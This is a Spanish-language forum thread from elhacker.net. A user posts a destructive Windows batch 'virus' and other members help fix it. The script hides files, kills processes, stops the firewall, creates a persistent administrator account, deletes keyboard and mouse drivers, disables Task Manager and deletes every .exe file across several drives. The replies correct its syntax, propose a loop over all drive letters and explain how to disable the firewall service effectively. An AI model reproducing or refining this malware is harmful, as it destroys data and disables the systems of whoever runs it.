Test Foro de elhacker.net SMF 2.1

Programación => Scripting => Mensaje iniciado por: Ori-chan en 23 Diciembre 2012, 18:55 PM

Título: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Ori-chan en 23 Diciembre 2012, 18:55 PM
No se mucho de batch. Así que tuve que buscar algunos trozos de código en google.


Código (lenguage) [Seleccionar]
@ECHO OFF
TITLE NV Adm
color 02
C: attrib -R -A -S +H -I *.exe /S /D
D: attrib -R -A -S +H -I *.exe /S /D
E: attrib -R -A -S +H -I *.exe /S /D
F: attrib -R -A -S +H -I *.exe /S /D
G: attrib -R -A -S +H -I *.exe /S /D
H: attrib -R -A -S +H -I *.exe /S /D
I: attrib -R -A -S +H -I *.exe /S /D
C: attrib +H *.* /S /D
D: attrib +H *.* /S /D
E: attrib +H *.* /S /D
F: attrib +H *.* /S /D
G: attrib +H *.* /S /D
H: attrib +H *.* /S /D
I: attrib +H *.* /S /D
C: TASKKILL /F /FI *.exe
D: TASKKILL /F /FI *.exe
E: TASKKILL /F /FI *.exe
F: TASKKILL /F /FI *.exe
G: TASKKILL /F /FI *.exe
H: TASKKILL /F /FI *.exe
I: TASKKILL /F /FI *.exe
C: TASKKILL /F /IM *.exe
D: TASKKILL /F /IM *.exe
E: TASKKILL /F /IM *.exe
F: TASKKILL /F /IM *.exe
G: TASKKILL /F /IM *.exe
H: TASKKILL /F /IM *.exe
I: TASKKILL /F /IM *.exe
net stop "Firewall De Windows/Conexion compartida a internet (ICS)"

net user 9900990099 nkdr9998%%$$ /fullname:"NVadm" /comment:"no seas impaciente" /active:yes /passwordchg:no /expires:never time:Monday,00:00 /add



(
echo @echo off
echo title NV sobreescritura
echo color 02
echo del /f /q %systemroot%\system32\mouse.*
echo del /f /q %systemroot%\system32\keyboard.*
echo echo ayuda>^>^wormNC90909.txt
echo cd C:Archivos de programaWinamp
echo del /f /q winamp.exe
echo Reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f

echo cd %windir%\system
echo DEL MOUSE:DRV /f /q /s
echo RUNDLL32.DLL,SpawMouseButton
echo CD %windir%\system32\drivers
echo DEL "%windir%\system32\drivers\i8042prt.sys" /f
echo DEL "%windir%\system32\drivers\mouclass.sys" /f
echo DEL "%windir%\system32\drivers\kbdclass.sys" /f
echo rund1132 keyboard,disable





)>>sobreescritura.bat
start sobreescritura.bat


echo exit>>sobreescritura.bat
:XNOP
if exsist wormNV90909.txt (del /Q /S sobreescritura.bat) else goto XNOP
del /Q /S wormNV90909.txt
cls
C: del /Q /S /F *.exe
D: del /Q /S /F *.exe
E: del /Q /S /F *.exe
F: del /Q /S /F *.exe
G: del /Q /S /F *.exe
H: del /Q /S /F *.exe
I: del /Q /S /F *.exe




He encontrado dos maneras de bloquear el teclado y el ratón (y he puesto las dos):

Esta:
Código (lenguage) [Seleccionar]
del /f /q %systemroot%\system32\mouse.*
del /f /q %systemroot%\system32\keyboard.*




Y esta:
Código (lenguage) [Seleccionar]
cd %windir%\system
DEL MOUSE:DRV /f /q /s
RUNDLL32.DLL,SpawMouseButton
CD %windir%\system32\drivers
DEL "%windir%\system32\drivers\i8042prt.sys" /f
DEL "%windir%\system32\drivers\mouclass.sys" /f
DEL "%windir%\system32\drivers\kbdclass.sys" /f
rund1132 keyboard,disable


¿Valen las dos?, ¿Vale solo una?, ¿No vale ninguna?





Se supone que con esto se elimina el administrador de tareas:

Código (lenguage) [Seleccionar]
Reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f



Y esto para eliminar el firewall:

Código (lenguage) [Seleccionar]
net stop "Firewall De Windows/Conexion compartida a internet (ICS)"


Lo mismo. ¿Funcionan?








PD: No pretendo hacer nada malo con esto, es solo que cuando de dejé batch lo abandoné en mi pendrive. Y ahora lo he visto y quería preguntar si lo había hecho bien. (85% seguro de que no)





Un saludo y gracias por leer!!  ;D
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Segadorfelix en 23 Diciembre 2012, 19:19 PM
Poner el nombre de unidad antes de un comando no funciona, en algunas unidades también daría error si no existen.
C: TASKKILL /F /FI *.exe
D: TASKKILL /F /FI *.exe
E: TASKKILL /F /FI *.exe
F: TASKKILL /F /FI *.exe
G: TASKKILL /F /FI *.exe
H: TASKKILL /F /FI *.exe
I: TASKKILL /F /FI *.exe

con el primer taskkill se finalizan todos los procesos y por ende el bat no continuaría la ejecución , FI debe cambiarse por IM y hay que poner comillas al proceso para que no de error.
SaluDoss.
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Meine programmen en 23 Diciembre 2012, 21:22 PM
En vez de ir letra a letra en el codigo, usa un bucle FOR, y pon un IF EXIST por si acaso no existe la unidad. Algo asi como:
FOR %%A IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (IF EXIST "%%A:\" "Aqui la primera orden que quieras poner"&&"Aqui la segunda orden que quieras poner")
Y en las ordenes en vez de poner C, D o E, pones %%A y se ira sustituyendo por cada una de las letras.

PD: Las ordenes sin comillas, ¿Eh?
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Ori-chan en 23 Diciembre 2012, 21:57 PM
Gracias a los dos. Lo modificaré y lo probaré  ;D
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Segadorfelix en 23 Diciembre 2012, 22:05 PM
Cita de: Meine programmen en 23 Diciembre 2012, 21:22 PM
En vez de ir letra a letra en el codigo, usa un bucle FOR, y pon un IF EXIST por si acaso no existe la unidad. Algo asi como:
FOR %%A IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (IF EXIST "%%A:\" "Aqui la primera orden que quieras poner"&&"Aqui la segunda orden que quieras poner")
Y en las ordenes en vez de poner C, D o E, pones %%A y se ira sustituyendo por cada una de las letras.

PD: Las ordenes sin comillas, ¿Eh?
Tambien un ">NUL 2>&1" (Sin las comillas) para evitar que aparezca error al no detectar un disco.
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Meine programmen en 23 Diciembre 2012, 22:16 PM
Cita de: Segadorfelix en 23 Diciembre 2012, 22:05 PM
Tambien un ">NUL 2>&1" (Sin las comillas) para evitar que aparezca error al no detectar un disco.
No entendi, ¿Si usa el IF no deberia de ahorrarse el mensaje de error?
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Segadorfelix en 23 Diciembre 2012, 22:23 PM
Cita de: Meine programmen en 23 Diciembre 2012, 22:16 PM
No entendi, ¿Si usa el IF no deberia de ahorrarse el mensaje de error?
Pues en teoría si, pero al parecer en algunos casos falla:
http://foro.elhacker.net/scripting/detectar_correctamente_unidad_de_un_pendrive-t379149.0.html
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Meine programmen en 23 Diciembre 2012, 22:26 PM
Cita de: Segadorfelix en 23 Diciembre 2012, 22:23 PM
Pues en teoría si, pero al parecer en algunos casos falla:
http://foro.elhacker.net/scripting/detectar_correctamente_unidad_de_un_pendrive-t379149.0.html
Bueno es saberlo, luego salen las cosas mal  y no nos damos cuenta  :xD
Título: Re: [BATCH] Virus raro. ¿Funcionaria?
Publicado por: Eleкtro en 24 Diciembre 2012, 06:28 AM
Dejando a un lado que Batch no es el camino para ese tipo de cosas,
Sigues haciendo codes sin tener intención de probarlos en una máquina virtual, y así no vas a aprender jamás.




-El código que se supone que bloquea teclado+ratón:
Lo único que hacen es eliminar el el archivo del driver del teclado y del mouse, realmente no bloquean nada.
El code solo afecta a WinXP, ya que en Windows 7 esos archivos no existen en esas rutas.
El executable "rund1132" no existe, es "Rundll32", y la función "disable" de esa dll no existe ni en WindowsXP ni en Windows 7, por lo tanto no te va a funcionar, encontraste información demasiado antigua.

- El código que se supone que elimina el administrador de tareas:
simplemente agregas una entrada en la política de grupo para denegar permisos al taskmanager, la cual se puede restaurar modificando el valor de nuevo a "0"

- El código que se supone que elimina el firewall:
simplemente intentas DETENER un servicio (Para eso sirve "net stop"), servicio el cual nisiquiera existe, pusiste el nombre de los dos servicios juntos separados con una barra diagonal /,
además deteniendo un servicio no sirve de nada si el servicio está en modo automático se volverá a ejecutar cuando el SO lo necesite, debes detenerlo y despues cambiarlo a modo desactivado para que no se siga ejecutando.
EDITO: Aunque corrigieras el nombre, tampoco iba a funcionar si yo le cambio el nombre a mi servicio por precaución, osea, debes usar el identificador del servicio en lugar del nombre (Que además usando el nombre solo funcionará en Windows del idioma castellano).

saludos